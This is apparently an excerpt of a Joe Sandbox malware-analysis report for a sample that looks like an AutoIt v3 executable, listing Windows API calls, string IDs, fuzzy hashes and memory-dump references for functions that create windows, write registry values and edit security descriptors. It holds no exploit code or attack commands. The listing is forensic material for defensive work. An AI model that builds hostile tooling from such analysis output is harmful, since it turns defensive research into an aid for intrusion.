• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: mouse_event
• String ID:
• API String ID: 2434400541-0
• Opcode ID: e9fb93e8c818906164e4e3ffcc75196ad0bae632f828f86756e64bccfd9ca6ce
• Instruction ID: ed215445a9a1d497900bb38e28d34a1585ab2e8961fc7cbe354b49d8c1ce7c18
• Opcode Fuzzy Hash: e9fb93e8c818906164e4e3ffcc75196ad0bae632f828f86756e64bccfd9ca6ce
• Instruction Fuzzy Hash: 89D017B61B020269EC280E3C9B2FF36090AAB02781F82434EB122D5595E4C19A24A121
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,0028075E), ref: 00280D4A
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: db6a9697dbb7ddcd788ad6178d2048c54af2a0a937091c29cc94abc421dbe010
• Instruction ID: fa3770447d3e5dd4a1611d6f656fc876a97232049a5bd85b644c830280c4f38a
• Opcode Fuzzy Hash: db6a9697dbb7ddcd788ad6178d2048c54af2a0a937091c29cc94abc421dbe010
• Instruction Fuzzy Hash:
APIs
• DeleteObject.GDI32(00000000), ref: 002E358D
• DeleteObject.GDI32(00000000), ref: 002E35A0
• DestroyWindow.USER32 ref: 002E35AF
• GetDesktopWindow.USER32 ref: 002E35CA
• GetWindowRect.USER32(00000000), ref: 002E35D1
• SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 002E3700
• AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 002E370E
• CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002E3755
• GetClientRect.USER32(00000000,?), ref: 002E3761
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 002E379D
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002E37BF
• GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002E37D2
• GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002E37DD
• GlobalLock.KERNEL32(00000000), ref: 002E37E6
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002E37F5
• GlobalUnlock.KERNEL32(00000000), ref: 002E37FE
• CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002E3805
• GlobalFree.KERNEL32(00000000), ref: 002E3810
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002E3822
• OleLoadPicture.OLEAUT32(?,00000000,00000000,00300C04,00000000), ref: 002E3838
• GlobalFree.KERNEL32(00000000), ref: 002E3848
• CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 002E386E
• SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 002E388D
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002E38AF
• ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002E3A9C
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
• String ID: $AutoIt v3$DISPLAY$static
• API String ID: 2211948467-2373415609
• Opcode ID: 75a95cf4738d5732680e774fcc84faaf979c92c097a6e1244c32b114d45eb3be
• Instruction ID: 66c7198a77adad1947d5d6f22f8d528dab2db3d09954f8f5501fee9b98448b17
• Opcode Fuzzy Hash: 75a95cf4738d5732680e774fcc84faaf979c92c097a6e1244c32b114d45eb3be
• Instruction Fuzzy Hash: 4702AB71910205AFDB14DF65DD8DEAE7BBAFB48321F108528F915AB2A0CB70AD51CF60
APIs
• DestroyWindow.USER32(?,?), ref: 002616B4
• SendMessageW.USER32(?,00001308,?,00000000), ref: 002A2B07
• ImageList_Remove.COMCTL32(?,000000FF,?), ref: 002A2B40
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 002A2F85
  • Part of subcall function 00261802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00261488,?,00000000,?,?,?,?,0026145A,00000000,?), ref: 00261865
• SendMessageW.USER32(?,00001053), ref: 002A2FC1
• SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 002A2FD8
• ImageList_Destroy.COMCTL32(00000000,?), ref: 002A2FEE
• ImageList_Destroy.COMCTL32(00000000,?), ref: 002A2FF9
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
• String ID: 0$(3$(3$(3
• API String ID: 2760611726-703799961
• Opcode ID: 1e3786715b9b905c70844094fdaf7307a125fd168f3c5c67ec2d282920462748
• Instruction ID: 23c18375c248c2b3abfe9288b22ebafa98b61c65540f10aba1aa1c0fdc21bf99
• Opcode Fuzzy Hash: 1e3786715b9b905c70844094fdaf7307a125fd168f3c5c67ec2d282920462748
• Instruction Fuzzy Hash: 8612A034224202DFC725DF28D884B6AB7EAFB46310F184569F4559B661CB31F8BACF91
APIs
• SetTextColor.GDI32(?,00000000), ref: 002F7B67
• GetSysColorBrush.USER32(0000000F), ref: 002F7B98
• GetSysColor.USER32(0000000F), ref: 002F7BA4
• SetBkColor.GDI32(?,000000FF), ref: 002F7BBE
• SelectObject.GDI32(?,?), ref: 002F7BCD
• InflateRect.USER32(?,000000FF,000000FF), ref: 002F7BF8
• GetSysColor.USER32(00000010), ref: 002F7C00
• CreateSolidBrush.GDI32(00000000), ref: 002F7C07
• FrameRect.USER32(?,?,00000000), ref: 002F7C16
• DeleteObject.GDI32(00000000), ref: 002F7C1D
• InflateRect.USER32(?,000000FE,000000FE), ref: 002F7C68
• FillRect.USER32(?,?,?), ref: 002F7C9A
• GetWindowLongW.USER32(?,000000F0), ref: 002F7CBC
  • Part of subcall function 002F7E22: GetSysColor.USER32(00000012), ref: 002F7E5B
  • Part of subcall function 002F7E22: SetTextColor.GDI32(?,002F7B2D), ref: 002F7E5F
  • Part of subcall function 002F7E22: GetSysColorBrush.USER32(0000000F), ref: 002F7E75
  • Part of subcall function 002F7E22: GetSysColor.USER32(0000000F), ref: 002F7E80
  • Part of subcall function 002F7E22: GetSysColor.USER32(00000011), ref: 002F7E9D
  • Part of subcall function 002F7E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 002F7EAB
  • Part of subcall function 002F7E22: SelectObject.GDI32(?,00000000), ref: 002F7EBC
  • Part of subcall function 002F7E22: SetBkColor.GDI32(?,?), ref: 002F7EC5
  • Part of subcall function 002F7E22: SelectObject.GDI32(?,?), ref: 002F7ED2
  • Part of subcall function 002F7E22: InflateRect.USER32(?,000000FF,000000FF), ref: 002F7EF1
  • Part of subcall function 002F7E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002F7F08
  • Part of subcall function 002F7E22: GetWindowLongW.USER32(?,000000F0), ref: 002F7F15
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4124339563-0
                                                                                                                                                                        • Opcode ID: 022a4ff3cf345bbdc3d2621c05aa4a57cb556b36d976ee3c34e2bdbe54c1050e
                                                                                                                                                                        • Instruction ID: 0d0275818a6f5fa4af6d9e67e00d5c773c88a0cf981422711abc01124f4370cd
                                                                                                                                                                        • Opcode Fuzzy Hash: 022a4ff3cf345bbdc3d2621c05aa4a57cb556b36d976ee3c34e2bdbe54c1050e
                                                                                                                                                                        • Instruction Fuzzy Hash: 3CA1AC72018305AFD7009F64EC4CE7BBBAAFB483B5F500A29FA62961E0D771D854CB51
APIs
• DestroyWindow.USER32(00000000), ref: 002E319B
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 002E32C7
• SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 002E3306
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 002E3316
• CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 002E335D
• GetClientRect.USER32(00000000,?), ref: 002E3369
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 002E33B2
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 002E33C1
• GetStockObject.GDI32(00000011), ref: 002E33D1
• SelectObject.GDI32(00000000,00000000), ref: 002E33D5
• GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 002E33E5
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 002E33EE
• DeleteDC.GDI32(00000000), ref: 002E33F7
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 002E3423
• SendMessageW.USER32(00000030,00000000,00000001), ref: 002E343A
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 002E347A
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 002E348E
• SendMessageW.USER32(00000404,00000001,00000000), ref: 002E349F
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 002E34D4
• GetStockObject.GDI32(00000011), ref: 002E34DF
• SendMessageW.USER32(00000030,00000000,?,50000000), ref: 002E34EA
• ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 002E34F4
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
• String ID: AutoIt v3$DISPLAY$msctls_progress32$static
• API String ID: 2910397461-517079104
• Opcode ID: ad22b182de248c62d0bf54336ddf66fdde1dc80ea623bc18ed62c6e86ebc134c
• Instruction ID: 5ce107b8795b9d4c14315258d13cc2889a6790277db7a1fb0232b3acad32e708
• Opcode Fuzzy Hash: ad22b182de248c62d0bf54336ddf66fdde1dc80ea623bc18ed62c6e86ebc134c
• Instruction Fuzzy Hash: 2DB16E71A50205AFDB14DFA9DC89FAFBBA9EB08711F004115FA15E7290C774AD50CFA0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 002D5532
• GetDriveTypeW.KERNEL32(?,002FDC30,?,\\.\,002FDCD0), ref: 002D560F
• SetErrorMode.KERNEL32(00000000,002FDC30,?,\\.\,002FDCD0), ref: 002D577B
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
• API String ID: 2907320926-4222207086
• Opcode ID: 2a975495b10d9abcc647e5d757c07019565db8552c8cabbfbf7a75f26311ad86
• Instruction ID: 122e711cc2378dd5c004a2697ed0b28ebe43323731c07fb4bc235c5a91d9d3d3
• Opcode Fuzzy Hash: 2a975495b10d9abcc647e5d757c07019565db8552c8cabbfbf7a75f26311ad86
• Instruction Fuzzy Hash: 5A61E530A78925DBE725DF24D9929B8B3A1FF04350B744017E426AB391C7F1DD61CB91
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002625F8
• GetSystemMetrics.USER32(00000007), ref: 00262600
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0026262B
• GetSystemMetrics.USER32(00000008), ref: 00262633
• GetSystemMetrics.USER32(00000004), ref: 00262658
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00262675
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00262685
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 002626B8
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 002626CC
• GetClientRect.USER32(00000000,000000FF), ref: 002626EA
• GetStockObject.GDI32(00000011), ref: 00262706
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00262711
  • Part of subcall function 002619CD: GetCursorPos.USER32(?), ref: 002619E1
  • Part of subcall function 002619CD: ScreenToClient.USER32(00000000,?), ref: 002619FE
  • Part of subcall function 002619CD: GetAsyncKeyState.USER32(00000001), ref: 00261A23
  • Part of subcall function 002619CD: GetAsyncKeyState.USER32(00000002), ref: 00261A3D
• SetTimer.USER32(00000000,00000000,00000028,0026199C), ref: 00262738
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: <)3$<)3$AutoIt v3 GUI$(3$(3$(3
• API String ID: 1458621304-398768274
• Opcode ID: 7646b305acaeb39ade9d0d2a5ea293fac2e1ad56593d7d2decbdc7e938c6d80a
• Instruction ID: 991680e11cc7546804661fcc9050279284e296389f05a93c629193f83ec34ae2
• Opcode Fuzzy Hash: 7646b305acaeb39ade9d0d2a5ea293fac2e1ad56593d7d2decbdc7e938c6d80a
• Instruction Fuzzy Hash: 41B16C71A1020ADFDB15DFA8DC89BAE7BB5FB48314F104129FA15EB290CB74A960CF51
APIs
• GetCursorPos.USER32(?), ref: 002F1BC4
• GetDesktopWindow.USER32 ref: 002F1BD9
• GetWindowRect.USER32(00000000), ref: 002F1BE0
• GetWindowLongW.USER32(?,000000F0), ref: 002F1C35
• DestroyWindow.USER32(?), ref: 002F1C55
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002F1C89
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002F1CA7
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 002F1CB9
• SendMessageW.USER32(00000000,00000421,?,?), ref: 002F1CCE
• SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 002F1CE1
• IsWindowVisible.USER32(00000000), ref: 002F1D3D
• SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 002F1D58
• SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 002F1D6C
• GetWindowRect.USER32(00000000,?), ref: 002F1D84
• MonitorFromPoint.USER32(?,?,00000002), ref: 002F1DAA
• GetMonitorInfoW.USER32(00000000,?), ref: 002F1DC4
• CopyRect.USER32(?,?), ref: 002F1DDB
• SendMessageW.USER32(00000000,00000412,00000000), ref: 002F1E46
Strings
Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                        • String ID: ($0$tooltips_class32
                                                                                                                                                                        • API String ID: 698492251-4156429822
                                                                                                                                                                        • Opcode ID: 34e64269811200f3db6945c1b94805b266a7d05f0cb5ee1a5ef4c73b47d8684a
                                                                                                                                                                        • Instruction ID: 32e4155ce979d8df9da16ba4c382342d6a3766abd6660f3942ee149815389462
                                                                                                                                                                        • Opcode Fuzzy Hash: 34e64269811200f3db6945c1b94805b266a7d05f0cb5ee1a5ef4c73b47d8684a
                                                                                                                                                                        • Instruction Fuzzy Hash: DCB18A71614301EFD704DF64D888B6AFBE5EF84350F408929FA999B2A1C731E864CB92
                                                                                                                                                                        APIs
                                                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 002F0D81
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F0DBB
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F0E25
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F0E8D
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F0F11
                                                                                                                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002F0F61
                                                                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002F0FA0
                                                                                                                                                                          • Part of subcall function 0027FD52: _wcslen.LIBCMT ref: 0027FD5D
                                                                                                                                                                          • Part of subcall function 002C2B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002C2BA5
                                                                                                                                                                          • Part of subcall function 002C2B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002C2BD7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                        • API String ID: 1103490817-719923060
                                                                                                                                                                        • Opcode ID: 1d69b66a5e800804f3f261ffebdfc35d501ffa09f51b19e5ff2bb6124146e7ac
                                                                                                                                                                        • Instruction ID: cbf8980f2543e9349537c5055a0812d208daa83e16e2d73573c2ffa430084fab
                                                                                                                                                                        • Opcode Fuzzy Hash: 1d69b66a5e800804f3f261ffebdfc35d501ffa09f51b19e5ff2bb6124146e7ac
                                                                                                                                                                        • Instruction Fuzzy Hash: D2E1D0312282168FC714EF24C59093AF3E5FF88394B54492DF9969B3A2DB30ED65CB41
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002C1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002C1A60
                                                                                                                                                                          • Part of subcall function 002C1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,002C14E7,?,?,?), ref: 002C1A6C
                                                                                                                                                                          • Part of subcall function 002C1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002C14E7,?,?,?), ref: 002C1A7B
                                                                                                                                                                          • Part of subcall function 002C1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002C14E7,?,?,?), ref: 002C1A82
                                                                                                                                                                          • Part of subcall function 002C1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002C1A99
                                                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002C1741
                                                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002C1775
                                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 002C178C
                                                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 002C17C6
                                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002C17E2
                                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 002C17F9
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 002C1801
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 002C1808
                                                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 002C1829
                                                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 002C1830
                                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002C185F
                                                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002C1881
                                                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002C1893
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002C18BA
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 002C18C1
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002C18CA
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 002C18D1
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002C18DA
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 002C18E1
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 002C18ED
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 002C18F4
                                                                                                                                                                          • Part of subcall function 002C1ADF: GetProcessHeap.KERNEL32(00000008,002C14FD,?,00000000,?,002C14FD,?), ref: 002C1AED
                                                                                                                                                                          • Part of subcall function 002C1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,002C14FD,?), ref: 002C1AF4
                                                                                                                                                                          • Part of subcall function 002C1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,002C14FD,?), ref: 002C1B03
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4175595110-0
                                                                                                                                                                        • Opcode ID: cc4cc4ebd3f55aea9c89ea46940c772cdf31ccce36cf913463e74f5d5c55e06c
                                                                                                                                                                        • Instruction ID: 3b8b8042b76b5bde87d020f4fd69bc03c91d56865388d1aa06ea29cb02f5a2d7
                                                                                                                                                                        • Opcode Fuzzy Hash: cc4cc4ebd3f55aea9c89ea46940c772cdf31ccce36cf913463e74f5d5c55e06c
                                                                                                                                                                        • Instruction Fuzzy Hash: 39717E71D1420AAFEF10DFA4EC49FAEBBB9BF05350F144229F914A6191DB319925CB60
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002ECF1D
                                                                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,002FDCD0,00000000,?,00000000,?,?), ref: 002ECFA4
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 002ED004
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002ED054
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002ED0CF
                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 002ED112
                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 002ED221
                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 002ED2AD
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 002ED2E1
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 002ED2EE
                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 002ED3C0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
